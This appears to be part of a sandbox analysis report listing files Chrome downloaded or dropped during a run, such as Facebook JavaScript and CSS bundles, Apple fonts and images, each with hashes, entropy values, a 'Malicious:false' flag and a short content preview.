                                                                                                                                                                                                                                Preview:.PNG........IHDR...2...Z.......*t....PLTE.........................................................ccc...............777mmm.........rrr......\\\.........)))...KKK...222.........@@@......$$$......bbb.........kkk000```........FFF........[[[PPPhhh............"""...:::......YYYppp555'''... {{{...~~~......HHH...VVV............yyy......................SSSuuu.............xxx...999...MMM___fff.........%%%.........<<<BBB+++444>>>........+....%tRNS.,......} .......H..........8........lO,.....IDATx...K..@....tq.A.u@.Q.u.....Xig..Kj..R.....}..-..IRg....b.[....V..ls.;k.X[.......5...8...F..;f.Q..tBv..U.......VotE(...F7Db.7j`.P....~2&c...r..woOi.....}.{...G...B4.a.D.W..g..%.X.S=WD.V.Zm....!$.@4.v.5.......mx.b&..u..3......(....+..o2......7....!...S.a<.O.P....;.I#.....c..w..$.~A2y...XI695=3. ._G.7...A.Y..-%.C...h.H6..?Y.u.'C....R.=....O$2.`!2..%...S.E.M48V......<.,.G....Y.0..Z.L....~/..any`...H.+.H,.l.g-,A#.....~R2..s>..d...`x.Y.2.nr..8{..s...ry...,.......}..:..>.%[8`VT.0Lv.H&.a
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4284)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):21931
                                                                                                                                                                                                                                Entropy (8bit):5.419955785131785
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:dt4lGr5R+DJ0QZjYcfyVgBuR0PLQey7mRvYEuLiL9CQRDH6:dt9lszXZJNRL6
                                                                                                                                                                                                                                MD5:06B55DE1E2F0ECDAF844BD6C74714273
                                                                                                                                                                                                                                SHA1:980117DB0563CA749CA31AE9E927374CAA4D729F
                                                                                                                                                                                                                                SHA-256:43D073D5228C0D204C23075BEFD16BF841120039AD37FEEB489EF62783EE6278
                                                                                                                                                                                                                                SHA-512:692C1BF38DE4B4CA01F33C754019DBFEF9EC8F8833BA48064ED12F606E65E80479CDC8378B7C211136E44BFA32C69FBF615FAAC9B2566DBF0934260EBBC1F451
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:"https://static.xx.fbcdn.net/rsrc.php/v3/yN/l/0,cross/S60_mKfvulW.css"
                                                                                                                                                                                                                                Preview:._5_my{display:inline-block;min-height:10px;min-width:10px;width:100%}._68qf:before{background:#373737;color:#fff;content:'Wait Time';font-size:8px;padding:0 1px;pointer-events:all;position:absolute;z-index:2}.._28hn{display:inline-block;width:100%}._4ez8{outline:1px solid #fa3e3e}._28ho{outline:1px solid #42b72a}.._9l2i ._9l2g,._9l2i ._1yv{border-radius:6px;box-shadow:0 2px 4px rgba(0, 0, 0, .1), 0 8px 16px rgba(0, 0, 0, .1);width:565px!important}._9l2i ._4t2a,._9l2i ._9l18{background-color:transparent}._9l2i ._9l19,._9l2i ._9l1d{box-sizing:border-box;margin:auto;width:565px}._9l2i ._9l1d ._9l16,._9l2i ._9l16{background-color:#fff;border-bottom:none;padding:18px 16px}._9l2i ._9l16 .clearfix{align-items:center;display:flex;justify-content:space-between}._9l2i ._9l16 .clearfix::after{display:none}._9l2i ._9l16 ._9l17{font-size:20px;line-height:24px}._9l2i ._9l16 ._9l15,._9l2i ._9l16 ._9l15:hover{background-color:#e4e6eb;background-image:url(/rsrc.php/v3/yn/r/J-J3z0h9x9f.png);background-
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):39178
                                                                                                                                                                                                                                Entropy (8bit):7.986263648230382
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:pkXIlvy3Jmdf7NDnfY4zGDgyOk1Qfdo/5IMVr2deM16QXEoX+ncl/qtEXEWL:pIECy7dfY4zGMyObfdo/5jmLXEm+nK/1
                                                                                                                                                                                                                                MD5:CD2CF2DBFA12E22A6C553016D2913637
                                                                                                                                                                                                                                SHA1:A94119AAA47E7A27CA8D104E15AABD04B33354B6
                                                                                                                                                                                                                                SHA-256:2D4A8FCE6CF39A05B6EC8EC5054E1BD7A236B4767763D0E81333EE768F8D4E4F
                                                                                                                                                                                                                                SHA-512:30012A778ECF9F3D349A0B42D0D7F67A22992DAD7BCAD5B81D9B04F6FBD7B7A82BCA15511A0430D115AB236F6190A78019F4C172CF18855670FAC0AED8E88304
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:RIFF....WEBPVP8L..../..2.M@r.H.$.1kD.....Y......?.../.E.>|.kTuH.v.m.[.#...:..vw.tkn..d..s.Pw..#I....n.,...1E.C....9"..'.#mo.....v.cYy.v.]y{...0.Hy..*....fM..._.k..@..X-..k8.........0S..@R+P...HR.6...|E.....b./0p.........I......0..;"...J..o...DIU.Z....$..J.\.%...o9U..!...%..Dkd}QD9..z@..W.#.s].".4...m.n.d.<.A.W..."3......3.#.v.....6~..x...oBx..T.$IRU%.....E.......K.X.?....R.((.........!. ....Q...............=.....`X..=J..LXJ.@A.e.oi"..E.2... .![..&....V)......"C8.*.....cD...|K$...X.(.......b..D"..JN..(.c...u...(.B..aTX..1...0....0.(..bx5.=..!..B[..e.z./.uz...Z.............f..f..@((.*...@..p......M....J.....|.......o..ed......2.....Kk.v./.S..+4oo.#J.Bs.b..k....u....!....%,1x..X..>...j;.......@.J.`..8.?.z?...cD>B...Fn.F....z..t.sDL...:....{.~......fL..$.....e:........hL ....t.x.Cm...J..PYIu..$#.B.....`.d$..4.T..-@.g......H..Y.6..Y......c.u...o.............efff..3/..x.s.{.{^W.'.:..u.....]....<Ex...4Z.Z.d..[X...U..W!...2..\..-.%WKV...*d-V.W.Z.Y.9.-V.+Y[.FaZrR-..S
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65359)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):200589
                                                                                                                                                                                                                                Entropy (8bit):5.379175388908165
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:vd3wWLstPIEovvdQfaPvQmfIiBSQZWc1APF3SDRns71iMw8F6Oum19udpz9/VgDc:V3wIvLvLwDXYn6L9C/G89Y357C
                                                                                                                                                                                                                                MD5:EE1AC470ECB79FEFCFA9EC4B52BA85DC
                                                                                                                                                                                                                                SHA1:15F59D28D417ECA124A7218466D45650D52EDD31
                                                                                                                                                                                                                                SHA-256:D415BBD88F59C56CB18AD305E006B0ECE3A2B5902504F66F4B07252812C5FBF1
                                                                                                                                                                                                                                SHA-512:B23FF3B718A765D52158571E59DF01B0AD5CA375930663116E2D30060C267BFB921372E85A745DFDFE0BFACB72C4D6334F4254694FFE1D2594FB97B09CB4AB9E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/y2/r/0uUeXNz0Xos.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("ReactFiberErrorDialog",["cr:8909"],(function(a,b,c,d,e,f,g){"use strict";function a(a){return b("cr:8909").showErrorDialog(a)}g.showErrorDialog=a}),98);.__d("ReactDOM-prod.classic",["EventListener","Promise","ReactFeatureFlags","ReactFiberErrorDialog","react","scheduler"],(function(d,e,f,g,h,i){"use strict";var j,k,l=j||e("react"),m=Object.assign;function n(d){var e="https://react.dev/errors/"+d;if(1<arguments.length){e+="?args[]="+encodeURIComponent(arguments[1]);for(var f=2;f<arguments.length;f++)e+="&args[]="+encodeURIComponent(arguments[f])}return"Minified React error #"+d+"; visit "+e+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var o=e("ReactFeatureFlags").alwaysThrottleRetries,p=e("ReactFeatureFlags").disableDefaultPropsExceptForClasses,q=e("ReactFeatureFlags").disableLegacyContextForFunctionComponents,r=e("ReactFeatureFlags").disableSchedulerTimeoutInWorkLoop,s=e("ReactFeatureFlags").ena
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 48 x 36, 4-bit colormap, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):185
                                                                                                                                                                                                                                Entropy (8bit):5.9780303893393345
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:yionv//thPlSYLl+1IHCRsHrXLRa+dn/23rIIGU5thNnkncm3w4qtmkW7PXl0VMa:6v/lhP0YLkyymvVGtjnUnRq0kW7N0xVp
                                                                                                                                                                                                                                MD5:07505E9DAC6DD922116F038EB58C9B88
                                                                                                                                                                                                                                SHA1:4DAB9005E4603F76A6FAD92FE78FB9C92D05B62F
                                                                                                                                                                                                                                SHA-256:C4DB75F643BB4DD47E39A9601FCC0A14621B588D5E4EBE987EE4828120BDE791
                                                                                                                                                                                                                                SHA-512:5A94B97148037E9A25AF768AF67A1AD5D4959E5D5C216DC5353FB159630302A74A990CCA20F787C024C6B7229A12920B287A88A4063514FBA534E7D1DB094C11
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR...0...$.....=k.9....PLTE"u.#t."s..OO.PP.OO.........o.......tRNSJ....J..J.j.\...DIDATx.c`T..ec$.. .].A...1..Z..!..%p.A....H...0......*.....]...Qp...al.....IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:exported SGML document, ASCII text, with very long lines (31220)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):50088
                                                                                                                                                                                                                                Entropy (8bit):5.4168756881776705
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:QT3Cl3UR5FlxRBsVZI2r4vlroHKay9/KUbBfNfGg2TnDdQs5CNthxTB3eARGTB:CBbFlxRurPAYfWs5sB3m
                                                                                                                                                                                                                                MD5:9923E44E3A1C3B76ACAFF0880CC06AB7
                                                                                                                                                                                                                                SHA1:75FD70940452C4804CA6C6DF2A7BEF31ADC2BF82
                                                                                                                                                                                                                                SHA-256:8726494E52BF0A93133D578698DEADE14D856A1836D8DF00CFC975E5FE1307E4
                                                                                                                                                                                                                                SHA-512:A7F7EC56F98B3F77C9BAB8C44BC405D280A295AAEC10688534815B1FB9B49A68453B2039CA622D033E9C868E97FE9927EF5EC2C52F82C50AD74EBAB7F26468B6
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3i6l24/yP/l/ru_RU/GcN06huceZG.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AsyncDOM",["CSS","DOM","FBLogger"],(function(a,b,c,d,e,f){a={invoke:function(a,c){for(var d=0;d<a.length;++d){var e=a[d],f=e[0],g=e[1],h=e[2];e=e[3];h=h&&c||null;g&&(h=b("DOM").scry(h||document.documentElement,g)[0]);h||b("FBLogger")("async_dom").warn("Could not find relativeTo element for %s AsyncDOM operation based on selector: %s",f,g);switch(f){case"hide":b("CSS").hide(h);break;case"show":b("CSS").show(h);break;case"setContent":b("DOM").setContent(h,e);break;case"appendContent":b("DOM").appendContent(h,e);break;case"prependContent":b("DOM").prependContent(h,e);break;case"insertAfter":b("DOM").insertAfter(h,e);break;case"insertBefore":b("DOM").insertBefore(h,e);break;case"remove":b("DOM").remove(h);break;case"replace":b("DOM").replace(h,e);break;default:b("FBLogger")("async_dom").warn("Received invalid command %s for AsyncDOM operation",f)}}}};e.exports=a}),null);.__d("AsyncResponse",["invariant","Bootloader","FBLogger","HTML","WebDriverConfig"],(function(a,b
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3003)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):18440
                                                                                                                                                                                                                                Entropy (8bit):5.255534167782927
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:kz8E0CXVpU4y7FeTEkrHfcBkoNiIvYcaSRCF+q4nAHY+6dDlqW1hCSallZsWY:kz8E0CXVpU4y7ZkrHfcBkSiIvYc/Re+J
                                                                                                                                                                                                                                MD5:5F765A4A59A407D5DAA33CC0B48F2A35
                                                                                                                                                                                                                                SHA1:44E29FDCCC78BAD49465D30F2AD9D5DE816AE150
                                                                                                                                                                                                                                SHA-256:5C98E1CF88ADBADBE52321041E084AA2D5BC4DAAFFBF8EC6C45A438E8D393202
                                                                                                                                                                                                                                SHA-512:ABD01A44A94A0BE2B000DB5BB60A439AFDA8948B32B3F0685AC9AFE175EC9E3701C3747457BE42032C1EA0707AF02109D46187FCA39F2815BD8AEDBBD365F38C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/assets/chunk.934.167974858ffab5c06580.js
                                                                                                                                                                                                                                Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[934],{7934:function(e,t,r){r.r(t),r.d(t,{default:function(){return W}}).var n,o,a=r(32722),i=r(24178).function s(){return o||(o=["app","appVersion","hardwareFamily","hardwareModel","os","osBuildNumber","osLanguages","osVersion","resourceRevNum","screenHeight","screenWidth","userAgent"].concat(["delegateApp","hardwareBrand","storeFrontCountryCode","storeFrontHeader"])),o}var p,c=i.SC.attachDelegate,u=i.Z_.cryptoRandomBase62String,l=i.Z_.exceptionString.function m(e){this.setDelegate({topic:e}),p||(p=!0,s().forEach((function(e){m.prototype[e]=function(t){return t&&t.hasOwnProperty(e)?t[e]:this.environment()[e]()}})))}m._className="eventHandlers.base",m.prototype.setDelegate=function(e){return c(this,e)},m.prototype.topic=function(){throw l(m._className,"topic")},m.prototype.environment=function(){throw l(m._className,"environment")},m.prototype.eventRecorder=function(){throw l(m._className
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):35798
                                                                                                                                                                                                                                Entropy (8bit):5.362239652266183
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:xLV9hhNz5ouQq7vDsCYDHlo+yg2GsGsgo4ST5dX4+eT7Fi8mR5lfKGiLHCWtvdTZ:e
                                                                                                                                                                                                                                MD5:3AB3496A7BFE9321B3FA0E2FC8668B14
                                                                                                                                                                                                                                SHA1:EC704CA797F15BCDC6DE9AF8AB9F8311EB82B2A4
                                                                                                                                                                                                                                SHA-256:E321803AB120C94CFFB459955214D4F783D14653749A9D9E01D5E81C5358C8D4
                                                                                                                                                                                                                                SHA-512:1DDAFCEB91F8AF68ADDE9686537147615BD504D38FE24FAC13007DA412A58686D633A09A2E629B79297A826524D10374058E1A1178684C45D43795A62992E63A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:"https://www.apple.com/wss/fonts?families=SF+Pro,v2|SF+Pro+Icons,v1|SF+Pro+Rounded,v1|New+York+Small,v1|New+York+Medium,v1"
                                                                                                                                                                                                                                Preview:@font-face {...font-family:'SF Pro Display';...font-style:normal;...font-weight:100;...src:local('.'), url("/wss/fonts/SF-Pro-Display/v2/sf-pro-display_ultralight.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Display/v2/sf-pro-display_ultralight.woff") format("woff"), url("/wss/fonts/SF-Pro-Display/v2/sf-pro-display_ultralight.ttf") format("truetype");.../* (C) 2015 Apple Inc. All rights reserved. */..}..@font-face {...font-family:'SF Pro Display';...font-style:italic;...font-weight:100;...src:local('.'), url("/wss/fonts/SF-Pro-Display/v2/sf-pro-display_ultralight-italic.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Display/v2/sf-pro-display_ultralight-italic.woff") format("woff"), url("/wss/fonts/SF-Pro-Display/v2/sf-pro-display_ultralight-italic.ttf") format("truetype");.../* (C) 2015 Apple Inc. All rights reserved. */..}..@font-face {...font-family:'SF Pro Display 100';...src:url('/wss/fonts/SF-Pro-Display/v2/sf-pro-display_ultralight.eot');.../* (C) 2015 Apple Inc. All righ
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (9961)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):45856
                                                                                                                                                                                                                                Entropy (8bit):5.377886737524556
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:JXXiX4/HZecX8WlUPWnRFXJbflLtmvbPRAS3mjAvxfdxYOVl/tS:JCrcX8WlU8tltgpAS3mjyV+ElS
                                                                                                                                                                                                                                MD5:476E8FABA1D7ADCD9E496FD9DC33B3C4
                                                                                                                                                                                                                                SHA1:F21B31317EB534E73E5BFDD72F0583E6D8A5B06D
                                                                                                                                                                                                                                SHA-256:716DB07ADC0E1F7318B14C1BE0EA61F84969E1B5A3562AE7366FB189383BF038
                                                                                                                                                                                                                                SHA-512:B8371737A4428D3DC81A3C600BC8468780E5586371F107FFB739E22BD1144EFC764090850D81543E963884B9AA19CB708ED130D1F3B0DF6BE1955E4CE388A27B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3i_Ou4/yX/l/en_GB/UlpshyJeqkw.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("ArtillerySegment",["invariant","cr:9985"],(function(a,b,c,d,e,f,g,h){var i=0;a=function(){function a(a){a||h(0,1496),"category"in a&&"description"in a||h(0,3138,JSON.stringify(a)),this.$1=!1,this.$2=babelHelpers["extends"]({},a,{id:(i++).toString(36)}),this.$3=[]}var c=a.prototype;c.getID=function(){return this.$2.id};c.begin=function(){this.$2.begin=b("cr:9985")();return this};c.end=function(){this.$2.end=b("cr:9985")();return this};c.appendChild=function(){var a=this;this.$1&&h(0,37302,this.$2.description);for(var b=arguments.length,c=new Array(b),d=0;d<b;d++)c[d]=arguments[d];c.forEach(function(b){a.$3.push(b.getID())});return this};c.setPosted=function(){this.$1=!0;return this};c.getPostData=function(){return babelHelpers["extends"]({},this.$2,{id:this.$2.id,children:this.$3.slice()})};return a}();g["default"]=a}),98);.__d("ArtillerySequence",["invariant"],(function(a,b,c,d,e,f,g,h){var i=0;a=function(){function a(a){a||h(0,1496),"description"in a||h(0,1497,
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (31470)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):45781
                                                                                                                                                                                                                                Entropy (8bit):5.4005500598459015
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:xq9DvQPUjkEO1ayPW9ZybWRxatCvEAGm45TqZYu:OpjU1PbWRxatC4m45uZYu
                                                                                                                                                                                                                                MD5:6126870CB22D062ABFAAEF09FF102DF5
                                                                                                                                                                                                                                SHA1:92AF3022CC9C9BE309E42FFE0F450ED3E95CA622
                                                                                                                                                                                                                                SHA-256:ED977AB797E2C2CD3EA3973E6A1A417CB0F0FA293CA6D9E0BE5B0D11FF3AC76F
                                                                                                                                                                                                                                SHA-512:F34B46A7E2CFB84AE103870ADEEAD1B9E73E0DAEFA03D7E210B985C2098418680D1496509F1D8C9F85D565270DFC55DB0B74988E19EB4FA77637239CADF07C12
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("Wedge.art",["ReactART","create-react-class","prop-types","react"],(function(a,b,c,d,e,f){var g,h=g||b("react"),i=b("ReactART").Shape,j=b("ReactART").Path;a=b("create-react-class")({displayName:"Wedge",propTypes:{outerRadius:b("prop-types").number.isRequired,startAngle:b("prop-types").number.isRequired,endAngle:b("prop-types").number.isRequired,innerRadius:b("prop-types").number},circleRadians:Math.PI*2,radiansPerDegree:Math.PI/180,_degreesToRadians:function(a){if(a!==0&&a%360===0)return this.circleRadians;else return a*this.radiansPerDegree%this.circleRadians},_createCirclePath:function(a,b){var c=j();c.move(0,a).arc(a*2,0,a).arc(-a*2,0,a);b&&c.move(a-b,0).counterArc(b*2,0,b).counterArc(-b*2,0,b);c.close();return c},_createArcPath:function(a,b,c,d){var e=j();a=this._degreesToRadians(a);b=this._degreesToRadians(b);var f=a>b?this.circleRadians-a+b:b-a,g=Math.sin(a),h=Math.sin(b);a=Math.cos(a);b=Math.cos(b);var i=h-g,k=b-a,l=d-c;f=f>Math.PI;e.move(c+c*g,c-c*a).arc(
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 107832, version 1.0
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):107832
                                                                                                                                                                                                                                Entropy (8bit):7.998208221352974
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:1536:rbxyXX3FkzPtA4ze42dWs8sIQ6Y3SQnCvy7gALT4I073hT8k32wl0JvGdUB4x:rS1kUx8siYiZv+n4Ie82jBdUB4x
                                                                                                                                                                                                                                MD5:2D753DE71684CC6C73161B6FE0C5A11C
                                                                                                                                                                                                                                SHA1:B9B14B843008B6C9E8D6E933DDF52587CE0E32D7
                                                                                                                                                                                                                                SHA-256:DC0663A7522F9A0A447DCA9A60A80275EA5906DDE2159B24CEA94A96D81DEE0C
                                                                                                                                                                                                                                SHA-512:ED6FA0618E66A26107FCD828CDAE61C623C0BA6A0EF3BF6F49C1382ECB6A327D20A73A1F072E9BE6C2074DF6390D4DB17AD747FF7E7D64F66E1C25515DDD1E56
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://www.apple.com/wss/fonts/SF-Pro-Display/v2/sf-pro-display_bold.woff2
                                                                                                                                                                                                                                Preview:wOF2.......8......}................................`..H.`*H...X...(....6.$..$..(.. ?meta....@. 8.t[.{.......}......R.Ju.1.u..WP...D:....:.v..{d..J:#.....T.nC@*g.4.Q...........,?..{?...$.. V\.V@[.BH..2.b.!.U....9.....L....i6..9.\dYR8.......;un.5...(.."...b......pK....%9.gR..Aa.=......y._&.z.s..LnU...!_HJ..'[....x..Z.....to!.>.....c.J.....O....D..wz.K....Q)Gec..[.. ..#:..T....^6..\..ap0W./..n.(...e....^r(......~i!..\....7d..Q.x...%...RQ...]....]`...N0......G.W.Z[B...Q..8..[k...u..I..+6X...IHL.V/.o.y........s..::.9......._(-"~..Uw.Y.Q.^5...oH.O.=.F...>.W....{..~SX..d..T.k ..^..a.u..&...wH...>....xp.B./T..........K..w5.7......IX.....V.%.J.......!Y..y]...-..w..N..Z..;<*p,....q..8G..}.g..].CrP..TK..*QL...h.Lno..5%......4A A.-t....~...O.z+.K..?.".....qn......O...}o.]@..B.....sz.^.....#..`...C.{.....D....1=.c.,.X.......hn.H.VR..2A:..c..V."..a..F..*..E,T..(..y...?s...y.V...Q.!q(H.B..ZT..jc.~...:@u..=...D..d,.L..............O................
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):326
                                                                                                                                                                                                                                Entropy (8bit):7.260242399614157
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6:Ok5ZTz+FyXIzvulGnFYqS8R85GZTb0FvSowvpbRcp2gHNuXmr4ntIyJtoTwO3byl:LzSAXIzvu4FYqU8ZX0F6owRcp2rsAtM4
                                                                                                                                                                                                                                MD5:6A4B15D70049AD2B6B2F67CDF08C885D
                                                                                                                                                                                                                                SHA1:A52320107374D519D13397D2172236F4526EB7E6
                                                                                                                                                                                                                                SHA-256:6213DCD17B474412DADFCF36A834F53E185A8DE8F9355AA51C632F6A025E0B20
                                                                                                                                                                                                                                SHA-512:8002BE9302A602D66746EC7B8A0DE89BD27E58938EBAD206C90FAAC00898D44D29BA6F699A8CBC4A20BEE42013E69B896ABF17BAFBB83A29658FBC1B81D14BF5
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:RIFF>...WEBPVP8L1.../?....\[.=z.*+}...T....m.mk<s...~.|..ED.'@.3.X....MQ%...B.....t..Z.Z4C0bJ=,....T}0..0...M...{.R...g.P...p#....7..U.&C(...Q^.|.i1.kRa.j..T...:..a;*X......h.G~.....+y~.UU>?.....3..t...j.ZTC@.)...j.....}#...o.b.&...@..oeb...at.[Y...e.:{K.cI.M.|....}..)...]p.1nE...".^."[P..;..gU..>.v...<G....
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (45939)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):97853
                                                                                                                                                                                                                                Entropy (8bit):4.6409695169080525
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:cR9pqLYmuEi/bA+TnJDpamoObnmodwbwnwmwowd6/yW8RNK+blic1rU6fJGnjkuN:6piVuEi/bA+TnJDpamoObnmodwbwnwmF
                                                                                                                                                                                                                                MD5:56922B59D92E23C35526DA118D91489B
                                                                                                                                                                                                                                SHA1:ED7E5AD4B9BA3A030DD1EF89DD1F8ACC263A3A1A
                                                                                                                                                                                                                                SHA-256:D6CD81C2A7964E01179F4311942C61B0ED49032C3C9112FB74EF5684A2B3F282
                                                                                                                                                                                                                                SHA-512:A408CC2D4FE5DC52529B11A88C9EDFC678A4E1CF634CF54F76A3739C7C8E555E726DAC3FEF362DF43A2871A46BA764F7DC29F477071CD6183617F4AC86C6D3EB
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3iNig4/y7/l/en_GB/79SeOVWXEcm.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("CometLinkNewImpl.react",["BaseLink.react","CometDangerouslySuppressInteractiveElementsContext","CometLinkUtils.react","FDSTextContext","gkx","isCometRouterUrl","react","react-strict-dom"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h||(h=d("react")),j=h.useContext,k={disabled:{color:"x1dntmbh",textDecorationLine:"x1ubmc1d xkrqix3",$$css:!0},root:{color:"x1heor9g",textDecorationLine:"x1sur9pj xkrqix3",$$css:!0}},l={block:{display:"x1lliihq",$$css:!0},"inline-block":{display:"x1rg5ohu",$$css:!0}};b=i.forwardRef(a);function a(a,b){var e=a.color_DEPRECATED,f=a.disabled;f=f===void 0?!1:f;var g=a.display_DEPRECATED;g=g===void 0?"inline":g;var h=a.href,m=a.role,n=a.target,o=a.weight_DEPRECATED,p=a.xstyle_DEPRECATED;a=babelHelpers.objectWithoutPropertiesLoose(a,["color_DEPRECATED","disabled","display_DEPRECATED","href","role","target","weight_DEPRECATED","xstyle_DEPRECATED"]);var q=d("FDSTextContext").useFDSTextContext(),r=j(c("CometDangerouslySuppressInteractiveEleme
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):75826
                                                                                                                                                                                                                                Entropy (8bit):7.9957491622723245
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:1536:oZb6ILUjdBFM/mo1Ysk+RCS+x2Y/+4Qwwe0uLfgu93TfDiDP1w2:W6U4BFYmo1U+E/4zwwqrCq2
                                                                                                                                                                                                                                MD5:36FB55BBCCA237887CD2D16C8EEF8693
                                                                                                                                                                                                                                SHA1:12A2DF1B3993E8D02B7C88B25A6FBE83D4FCAE8F
                                                                                                                                                                                                                                SHA-256:FDA7D35F1C33D32981497844E22307A4E27C82836FBFC63444906C4ED73AC4B8
                                                                                                                                                                                                                                SHA-512:877F4C53FBBCEAFD52D2D43BBB68D409941E9B5401C76ABD726AD670BD2FE3073BBB251E5F7DF1B4DC3164D1FA8F7D141A784D93BD9EC78978F132396A233BD2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
